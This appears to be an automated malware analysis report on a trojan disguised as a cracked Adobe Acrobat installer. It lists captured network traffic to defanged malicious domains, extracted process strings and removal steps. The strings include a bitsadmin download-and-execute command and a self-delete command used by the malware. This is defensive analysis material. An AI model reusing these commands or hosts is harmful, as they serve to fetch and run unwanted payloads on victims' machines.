GET /MEQwQjBAMD4wPDAJBgUrDgMCGgUABBSxtDkXkBa3l3lQEfFgudSiPNvt7gQUAPkqw0GRtsnCuD5V8sCXEROgByACAwI6kg== HTTP/1.1
Cache-Control: max-age = 564348
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Wed, 12 Oct 2016 22:33:53 GMT
User-Agent: Microsoft-CryptoAPI/6.1
Host: g.symcd.com


HTTP/1.1 200 OK
Server: nginx/1.10.1
Content-Type: application/ocsp-response
Content-Length: 1362
content-transfer-encoding: binary
Cache-Control: max-age=563527, public, no-transform, must-revalidate
Last-Modified: Sun, 27 Nov 2016 04:06:13 GMT
Expires: Sun, 4 Dec 2016 04:06:13 GMT
Date: Sun, 27 Nov 2016 15:38:44 GMT
Connection: keep-alive

<<< skipped >>>

GET /report.php?typ=conversion&transId=139867460&affId=1006&instId=11&ho_transId=1024c893cfbfff9cc18408df1cefd7&s1=2735&s2=10958132&s3=&s4=&s5=1352224761&cid=5c12d1104cca24294ae7d8d45ce8d028&uac=true&randid=0.45457626983710575 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: InstallCapital
Host: ee.wintervenepest.bid


HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Date: Sun, 27 Nov 2016 15:37:30 GMT
Content-Length: 0


GET hXXp://will.ymuscaesnortin.bid/offer.php?affId=1006&trackingId=139867460&instId=11&ho_trackingid=1024c893cfbfff9cc18408df1cefd7&cc=UA&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 HTTP/1.1
Host: will.ymuscaesnortin.bid
Connection: close
Accept: */*
User-Agent: InstallCapital


HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 5248
Connection: close
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Date: Sun, 27 Nov 2016 15:37:22 GMT
X-Cache: Miss from cloudfront
Via: 1.1 0176a7920fd558900dd5f893f79acb9e.cloudfront.net (CloudFront)
X-Amz-Cf-Id: l1my4O3razMEiR5YydeNmDYHWI5pPOfTnr-Yh5bIzfchTkSNUDbItg==

<<< skipped >>>

GET /?affId=1006&appTitle=Adobe%20Acrobat%20XI%20Pro%2011.0.18%20M&s1=2735&s2=10958132&setupName=cpSetup&appVersion=2.92&instId=11&exe=1 HTTP/1.0
Host: get.ynoptisticglob.bid
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*


HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Connection: close
Server: nginx/1.10.1
Date: Sun, 27 Nov 2016 15:38:10 GMT
X-Powered-By: PHP/5.4.16
Location: hXXp://away.yosauruslega.bid/get.php?ses=482796663418412224
X-Cache: Miss from cloudfront
Via: 1.1 3ef066dcf359ad5dbc339df978147194.cloudfront.net (CloudFront)
X-Amz-Cf-Id: RMWwWYPKPbgGnBwxbKPHR9ahWyMUS2Lgqtmka11YcIwRIWnNjdqqJQ==


GET /redirect?ad_unit=64&aid=A3097212614-1055013556-759180181&ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&var3=9999 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: ads.affbuzzads.com
Connection: Keep-Alive


HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Sun, 27 Nov 2016 15:38:42 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Location: hXXp://tour.cinemaden.com/movie_player/twin?ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&landing_page_id=33&clk=1&tc=167172_64_557_33_138_8038&click_id=20161127-27f60d0a-0394-4b1f-a628-2ca0cae693d9&ega=0


GET hXXp://win.ketydesmidiana.bid/aff_c?offer_id=4&aff_id=1006&source=11&aff_sub=2735&aff_sub2=10958132&aff_sub3=&aff_sub4=&aff_sub5=1352224761&url=http://will.ymuscaesnortin.bid/offer.php?affId={aff_id}&trackingId=139867460&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 HTTP/1.1
Host: win.ketydesmidiana.bid
Connection: close
Accept: */*
User-Agent: InstallCapital


HTTP/1.1 302 Found
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=iso-8859-1
Date: Sun, 27 Nov 2016 15:38:13 GMT
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Location: hXXp://will.ymuscaesnortin.bid/offer.php?affId=1006&trackingId=139867460&instId=11&ho_trackingid=1024c893cfbfff9cc18408df1cefd7&cc=UA&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2
P3P: CP="NOI CUR OUR NOR INT"
Pragma: no-cache
Server: nginx/1.7.9
Set-Cookie: enc_aff_session_4=ENC02734-1024c893cfbfff9cc18408df1cefd7-1006-4-0-0-0-0-UA-0-3131-32373335-3130393538313332-_-_-31333532323234373631-194.242.96.226-20161127103813-_-05006D112A1D243C70397465550C64525E4D096750152358604977030A45533D7834601B4D480F741D; expires=Tue, 27 Dec 2016 15:38:13 GMT; path=/;
Set-Cookie: ho_mob=eyJtb2JpbGVfY2FycmllciI6Ij8iLCJ1c2VyX2FnZW50IjoiSW5zdGFsbENhcGl0YWwiLCJjb25uZWN0aW9uX3NwZWVkIjoiYnJvYWRiYW5kIn0=; expires=Wed, 23 Oct 2019 02:18:13 GMT; path=/;
tracking_id: 1024c893cfbfff9cc18408df1cefd7
X-Robots-Tag: noindex, nofollow
Content-Length: 453
Connection: Close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="hXXp://will.ymuscaesnortin.bid/offer.php?affId=1006&trackingId=139867460&instId=11&ho_trackingid=1024c893cfbfff9cc18408df1cefd7&cc=UA&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2">here</a>.</p>
</body></html>

<<< skipped >>>

GET /ocsp/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih+ZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCG8Char7jo+T HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: clients1.google.com


HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Thu, 24 Nov 2016 19:16:52 GMT
Expires: Mon, 28 Nov 2016 19:16:52 GMT
Server: ocsp_responder
Content-Length: 463
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Age: 246112
Cache-Control: public, max-age=345600



GET /ocsp/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih+ZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCHNzUKtRZktz HTTP/1.1

Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: clients1.google.com


HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Thu, 24 Nov 2016 20:12:58 GMT
Expires: Mon, 28 Nov 2016 20:12:58 GMT
Server: ocsp_responder
Content-Length: 463
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Age: 242748
Cache-Control: public, max-age=345600


GET /r/collect?v=1&_v=j47&a=561957627&t=pageview&_s=1&dl=http://tour.cinemaden.com/movie_player/twin?ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&landing_page_id=33&clk=1&tc=167172_64_557_33_138_8038&click_id=20161127-27f60d0a-0394-4b1f-a628-2ca0cae693d9&ega=0&dp=http://tour.cinemaden.com/movie_player/twin?ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&landing_page_id=33&clk=1&tc=167172_64_557_33_138_8038&click_id=20161127-27f60d0a-0394-4b1f-a628-2ca0cae693d9&ega=0&ul=en-us&de=utf-8&dt=EN Movie Player TWIN&sd=24-bit&sr=1916x902&vp=1173x539&je=1&fl=23.0 r0&_u=AEAAAEAAI~&jid=2066430644&cid=1439064958.1480261126&tid=UA-13179523-2&_r=1&z=2067671186 HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: hXXp://tour.cinemaden.com/movie_player/twin?ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&landing_page_id=33&clk=1&tc=167172_64_557_33_138_8038&click_id=20161127-27f60d0a-0394-4b1f-a628-2ca0cae693d9&ega=0
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: VVV.google-analytics.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Date: Sun, 27 Nov 2016 15:38:47 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate
Last-Modified: Sun, 17 May 1998 03:00:00 GMT
X-Content-Type-Options: nosniff
Content-Type: image/gif
Server: Golfe2
Content-Length: 35


GET /appImg.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: d2adi7hu49xk5t.cloudfront.net
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: image/jpeg
Content-Length: 4628
Connection: keep-alive
Date: Thu, 22 Sep 2016 18:01:12 GMT
Last-Modified: Mon, 13 Jun 2016 11:29:06 GMT
ETag: "ba6c4124ad5d33528fe1d609e6ac1ff0"
Accept-Ranges: bytes
Server: AmazonS3
Age: 74433
X-Cache: Hit from cloudfront
Via: 1.1 616f617776e843142ab5d87231cb3526.cloudfront.net (CloudFront)
X-Amz-Cf-Id: eXOPAKCBYjP73UFpmlKl_Stk7IsY9FpCsFHwDlzEkoSBu4TrH411fQ==

<<< skipped >>>

The Trojan connects to the servers at the following location(s):

%original file name%.exe_3584:

.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
... %d%%
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\setup.exe
p&tid=10958132&pid=2735&b_typ=pe&reb=1&name=Adobe Acrobat XI Pro 11.0.18 Multilingual + Crack
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\B->C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\setup.exe
venzip&tid=10958132&pid=2735&b_typ=pe&reb=1&name=Adobe Acrobat XI Pro 11.0.18 Multilingual + Crack
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\B
etc.dll
version="0.5.0.0"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
<requestedExecutionLevel level="requireAdministrator" />
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>
<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>
<windowsSettings>
<dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>
</windowsSettings>
MSVCRT.dll
HttpSendRequestA
HttpSendRequestExA
HttpQueryInfoA
FtpCreateDirectoryA
FtpOpenFileA
HttpOpenRequestA
HttpAddRequestHeadersA
HttpEndRequestA
InternetCrackUrlA
WININET.dll
inetc.dll
Open URL Error
URL Parts Error
FtpCreateDir failed (550)
Error FTP path (550)
Downloading %s
%dkB (%d%%) of %dkB @ %d.dkB/s
(%d %s%s remaining)
REST %d
SIZE %s
Content-Length: %d
Content-Type: application/x-www-form-urlencoded
Authorization: basic %s
Proxy-authorization: basic %s
%s:%s
FtpCommandA
wininet.dll
%u MB
%u kB
%u bytes
%d:d:d
%s - %s
(Err=%d)
NSIS_Inetc (Mozilla)
Filename: %s
/password
Uploading %s
9!9-9B9}9
.reloc
System.dll
callback%d
piAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>
@.reloc
u.Uj@
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp
nsi28E5.tmp
s\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\setup.exe
e=Adobe Acrobat XI Pro 11.0.18 Multilingual + Crack
\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\ItNP6AjIFY
enzip&tid=10958132&pid=2735&b_typ=pe&reb=1&name=Adobe Acrobat XI Pro 11.0.18 Multilingual + Crack
ff.ncongruousric.bid/stub_maker.php?program=sevenzip&tid=10958132&pid=2735&b_typ=pe&reb=1&name=Adobe Acrobat XI Pro 11.0.18 Multilingual + Crack
c:\%original file name%.exe
%original file name%.exe
ers\"%CurrentUserName%"\AppData\Local\Temp\nsn28B5.tmp
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\
201611271537
hXXp://off.ncongruousric.bid/stub_maker.php?program=sevenzip&tid=10958132&pid=2735&b_typ=pe&reb=1&name=Adobe Acrobat XI Pro 11.0.18 Multilingual + Crack
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>
0.9.0.0
emuext.exe

%original file name%.exe_3584_rwx_10004000_00001000:

callback%d

iexplore.exe_1772:

.text
`.data
.rsrc
@.reloc
>.uzf
.us;}
IEFRAME.dll
MLANG.dll
iertutil.dll
urlmon.dll
ole32.dll
SHELL32.dll
SHLWAPI.dll
msvcrt.dll
USER32.dll
KERNEL32.dll
ADVAPI32.dll
RegOpenKeyExW
RegCloseKey
GetWindowsDirectoryW
_amsg_exit
_wcmdln
UrlApplySchemeW
PathIsURLW
UrlCanonicalizeW
UrlCreateFromPathW
iexplore.pdb
Microsoft.InternetExplorer.Default
user32.dll
Kernel32.DLL
xfire.exe
wlmail.exe
winamp.exe
waol.exe
sidebar.exe
psocdesigner.exe
np.exe
netscape.exe
netcaptor.exe
neoplanet.exe
msn.exe
mshtmpad.exe
mshta.exe
loader42.exe
infopath.exe
iexplore.exe
iepreview.exe
groove.exe
explorer.exe
dreamweaver.exe
contribute.exe
aol.exe
{28fb17e0-d393-439d-9a21-9474a070473a}
Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
DShell32.dll
Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe
Software\Microsoft\Active Setup\Installed Components\>{26923b43-4d38-484f-9b9e-de460746276c}
"%s" %s
Kernel32.dll
\AppPatch\sysmain.sdb
-extoff go.microsoft.com/fwlink/?LinkId=106323
-extoff go.microsoft.com/fwlink/?LinkId=106322
-extoff go.microsoft.com/fwlink/?LinkId=106320
kernel32.dll
{00000000-0000-0000-0000-000000000000}
\\?\Volume
shell:%s
Imaging_CreateWebPagePreview_Perftrack
Browseui_Tabs_Tearoff_BetweenWindows
Frame_URLEntered
Imaging_CreateWebPagePreview
WS_ExecuteQuery
Shdocvw_BaseBrowser_FireEvent_WindowStateChanged
IdleTask_Execution_Time
9.00.8112.16421 (WIN7_IE9_RTM.110308-0330)
IEXPLORE.EXE
Windows
9.00.8112.16421

iexplore.exe_1608:

.text
`.data
.rsrc
@.reloc
>.uzf
.us;}
IEFRAME.dll
MLANG.dll
iertutil.dll
urlmon.dll
ole32.dll
SHELL32.dll
SHLWAPI.dll
msvcrt.dll
USER32.dll
KERNEL32.dll
ADVAPI32.dll
RegOpenKeyExW
RegCloseKey
GetWindowsDirectoryW
_amsg_exit
_wcmdln
UrlApplySchemeW
PathIsURLW
UrlCanonicalizeW
UrlCreateFromPathW
iexplore.pdb
Microsoft.InternetExplorer.Default
user32.dll
Kernel32.DLL
xfire.exe
wlmail.exe
winamp.exe
waol.exe
sidebar.exe
psocdesigner.exe
np.exe
netscape.exe
netcaptor.exe
neoplanet.exe
msn.exe
mshtmpad.exe
mshta.exe
loader42.exe
infopath.exe
iexplore.exe
iepreview.exe
groove.exe
explorer.exe
dreamweaver.exe
contribute.exe
aol.exe
{28fb17e0-d393-439d-9a21-9474a070473a}
Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
DShell32.dll
Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe
Software\Microsoft\Active Setup\Installed Components\>{26923b43-4d38-484f-9b9e-de460746276c}
"%s" %s
Kernel32.dll
\AppPatch\sysmain.sdb
-extoff go.microsoft.com/fwlink/?LinkId=106323
-extoff go.microsoft.com/fwlink/?LinkId=106322
-extoff go.microsoft.com/fwlink/?LinkId=106320
kernel32.dll
{00000000-0000-0000-0000-000000000000}
\\?\Volume
shell:%s
Imaging_CreateWebPagePreview_Perftrack
Browseui_Tabs_Tearoff_BetweenWindows
Frame_URLEntered
Imaging_CreateWebPagePreview
WS_ExecuteQuery
Shdocvw_BaseBrowser_FireEvent_WindowStateChanged
IdleTask_Execution_Time
9.00.8112.16421 (WIN7_IE9_RTM.110308-0330)
IEXPLORE.EXE
Windows
9.00.8112.16421

Setup__2140_il2.exe_896:

.text
`.rdata
@.data
.rsrc
@.reloc
Visual C++ CRT: Not enough memory to complete call to strerror.
Broken pipe
Inappropriate I/O control operation
Operation not permitted
portuguese-brazilian
operator
GetProcessWindowStation
WinHttpSetStatusCallback
Failed to get the Temp folder: %d
RegOpenKeyTransactedW
RegCreateKeyTransactedW
RegDeleteKeyTransactedW
RegDeleteKeyExW
CInstallationManager::IsPartOfInstallation value=%s
CInstallationManager::SetComponentInstallationEnded %S
%Y-%m-%d %H:%M:%S
CProgressUpdateRequest::CreateInstance %S
CProgressUpdateRequest::ProgressUpdate %S
Send progress update request %s
Progress Request for '%S' return %s
%c%c%c%c
C:\Amon\AmonSystemBs\BootStrapper\ProductionNoSign\Launcher.pdb
VERSION.dll
KERNEL32.dll
USER32.dll
GDI32.dll
RegDeleteKeyW
RegCloseKey
RegQueryInfoKeyW
RegEnumKeyExW
RegOpenKeyExW
RegCreateKeyExW
ADVAPI32.dll
SHELL32.dll
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
Secur32.dll
WinHttpCloseHandle
WinHttpOpen
WinHttpSetOption
WinHttpGetProxyForUrl
WinHttpCrackUrl
WinHttpConnect
WinHttpOpenRequest
WinHttpSetStatusCallback
WinHttpSendRequest
WinHttpQueryHeaders
WinHttpQueryDataAvailable
WinHttpReadData
WinHttpReceiveResponse
WINHTTP.dll
GetProcessHeap
GetCPInfo
zcÁ
.?AVAsyncWinHttp@@
.?AV?$_IDispEventLocator@$0MJ@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@
.?AV?$IDispEventSimpleImpl@$0MJ@VCBoot@@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@
.?AUISupportErrorInfo@@
.?AV?$CAtlExeModuleT@VCBootStrapperModule@@@ATL@@
?456789:;<=
!"#$%&'()* ,-./0123
vinyls.tramell.1 = s 'Inst Class'
CLSID = s '{dded0858-104b-4eec-a82e-a44b49d78594}'
vinyls.tramell = s 'Inst Class'
CurVer = s 'vinyls.tramell.1'
ForceRemove {dded0858-104b-4eec-a82e-a44b49d78594} = s 'Inst Class'
ProgID = s 'vinyls.tramell.1'
VersionIndependentProgID = s 'vinyls.tramell'
val ServerExecutable = s '%MODULE_RAW%'
TypeLib = s '{a0e998a2-81f0-420b-a12b-563442cf5349}'
<assemblyIdentity type="win32" processorArchitecture="*" version="1.2.1.2" name="win"/>
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>
<ms_asmv2:requestedExecutionLevel level="requireAdministrator" uiAccess="false"/>
type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*" />
stdole2.tlbWWW(
msgWd
keyNameW
urlW
url2d
YtcmdLineW
P%CreateIconWW
iconUrlW
regKeyWW
CheckRegKeyW
keyWd
W.launchCommandLineWWW
~cmdW
WDIsShortNameInstalledd
Created by MIDL version 7.00.0555 at Mon Nov 21 09:30:06 2016
mscoree.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
wKERNEL32.DLL
ADVAPI32.DLL
WUSER32.DLL
Winhttp.dll
Content-Type: application/x-www-form-urlencoded
shlwapi.dll
HKEY_CURRENT_CONFIG
HKEY_DYN_DATA
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
appimageurl
cmdl
capp=%s&cid=%s&mhx=%S&base=%s
\bitsadmin.exe
\Support Tools\bitsadmin.exe
%sami%s%d%d.exe
%d-%.2d-%.2dT%.2d:%.2d:00
%d-%.2d-%.2dT%.2d:-:00
/retrynav %d
Advapi32.dll
shell32.dll
{23A96663-59D1-4C44-A0DB-1118D9C4ABBA}
OLEAUT32.DLL
kernel32.dll
sn=%s&hx=%S&base=%s
rfsw%d
advapi32.dll
v2.0.50727
v1.1.4322
Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
%ProgramFiles%\Microsoft Silverlight\sllauncher.exe
NT%d.%dSP%d
ami%sExd
bitsadmin /transfer amijob /download /priority high %s %s
ami%sExi
/c del "%s"
cmd.exe
%TEMP%\task.vbs
ami%sExdel
version.dll
OleAut32.dll
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\Setup__2140_il2.exe
{8856F961-340A-11D0-A96B-00C04FD705A2}
1.1.5.26
setup.exe
secularistsarakolet.site

setup.exe_1104:

.idata
.rdata
P.pr0
.reloc
P.rsrc
kernel32.dll
Windows
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
EVariantBadIndexError
ssShift
htKeyword
EInvalidOperation
%s[%d]
%s_%d
EInvalidGraphicOperation
USER32.DLL
comctl32.dll
uxtheme.dll
PasswordChar
OnKeyDown0
OnKeyPress
OnKeyUp
ssHorizontal
OnKeyUpl
Proportional
%s%s%s%s%s%s%s%s%s%s
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
TKeyEvent
TKeyPressEvent
HelpKeywordDpA
crSQLWait
%s (%s)
imm32.dll
AutoHotkeys
AutoHotkeysH
ssHotTrack
TWindowState
poProportional
TWMKey
KeyPreview
WindowState,
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
User32.dll
MAPI32.DLL
ole32.dll
olepro32.dll
1.2.3
Invalid ZStream operation!
Options.dat
msimg32.dll
Cannot load image. %s not supported for %s files.
Cannot load image. Palette in %s file is invalid.
Cannot load image. Invalid or unexpected %s image format.
Cannot load image. CRC error found in %s file.
Cannot load image. Extra compressed data found in %s file.
Cannot load image. Compression error found in %s file.
Invalid color format in %s file.
Conversion between indexed and non-indexed pixel formats is not supported.
Portable network graphics (AlphaControls)
TacMDIWnd
user32.dll
WEBBUTTON
TacMenuSupport
TacMenuSupport$
Webdings
CRASPIPETTE
TacScrollBarsSupport
TacButtonsSupport
TacLabelsSupport
MenuSupport
c:\Skins
1.tmp
.JPEG
2.tmp
Please, update skins to latest or contact the AlphaControls support for upgrading of existing skin.
This version of the skin have not complete support by used AlphaControls package release.
TAddItemExEvent
DWMAPI.DLL
acMDIIcons
lblUrlLeid0
lblUrlLeidMouseMove
lblUrlLeidMouseLeave
lblUrlLeidClick
15.7.0
painter@adobe.com
11.0.0
10.0.0
13.8.1
13.8.0
13.5.0
13.1.1
12.0.0
15.2.0
9.2.1
8.0.0
7.0.0
6.0.0
5.0.0
Auditon-CS5.5.5-Win-GM
4.0.0
1.0.0
16.0.32
15.0.0
13.0.0
11.5.0
14.0.0
20.1.0
19.0.0
18.0.0
17.0.0
16.0.0
15.1.0
9.0.0
8.0.1
7.5.0
10.4.0
17.0.1
12.1.0
6.6.1
3.0.0
spc_player.dll
notepad.exe
"%s" %s
amtlib.dll|amtlib.dll
%s [%s]
Extract DLL: %s
\painter.ini
Extract INI: %s
Adobe\OOBE\PDApp\P6\IMSLib.dll
Adobe\OOBE\PDApp\P7\IMSLib.dll
\IMSLib.dll
\AdobePIP.dll
hXXps://helpx.adobe.com/creative-cloud/packager/creative-cloud-licensing-identifiers.html
inflate 1.2.3 Copyright 1995-2005 Mark Adler
2588000
0123456789.
jC:\Users\"%CurrentUserName%"\AppData\Local\Temp\spc_player.dll
3uqkernel32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
GetCPInfo
version.dll
gdi32.dll
SetViewportOrgEx
GetViewportOrgEx
UnhookWindowsHookEx
SetWindowsHookExA
MsgWaitForMultipleObjects
MapVirtualKeyA
LoadKeyboardLayoutA
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextA
EnumWindows
EnumThreadWindows
EnumChildWindows
ActivateKeyboardLayout
shell32.dll
ShellExecuteA
comdlg32.dll
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
GetProcessWindowStation
operator
activation.php?code=
deactivation.php?hash=
.?AVIUrlBuilderSource@@
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\setup.exe
GetConsoleOutputCP
version="0.5.0.0"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
<requestedExecutionLevel level="requireAdministrator" />
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>
<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>
<windowsSettings>
<dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>
</windowsSettings>
KERNEL32.DLL
mscoree.dll
Error at initialization of bundled DLL: %s
Error at hooking API "%S"
Dumping first %d bytes:
0.9.0.0
emuext.exe

setup.exe_1104_rwx_00549000_00001000:

Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
KERNEL32.DLL
mscoree.dll

setup.exe_1104_rwx_0054D000_00003000:

.?AVIUrlBuilderSource@@
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\setup.exe

setup.exe_1104_rwx_00653000_00001000:

SetViewportOrgEx
MapVirtualKeyA
advapi32.dll
GetKeyboardType


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    Setup__2140_il2.exe:3044
    sevensetup.exe:2608
    583afdedde2bb_ua.exe:1576
    cpSetup.exe:2892
    G5wycqyxwV.exe:3900

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GPS1JHSL\index[1].htm (9382 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\318DR7NG\index[1].htm (7399 bytes)
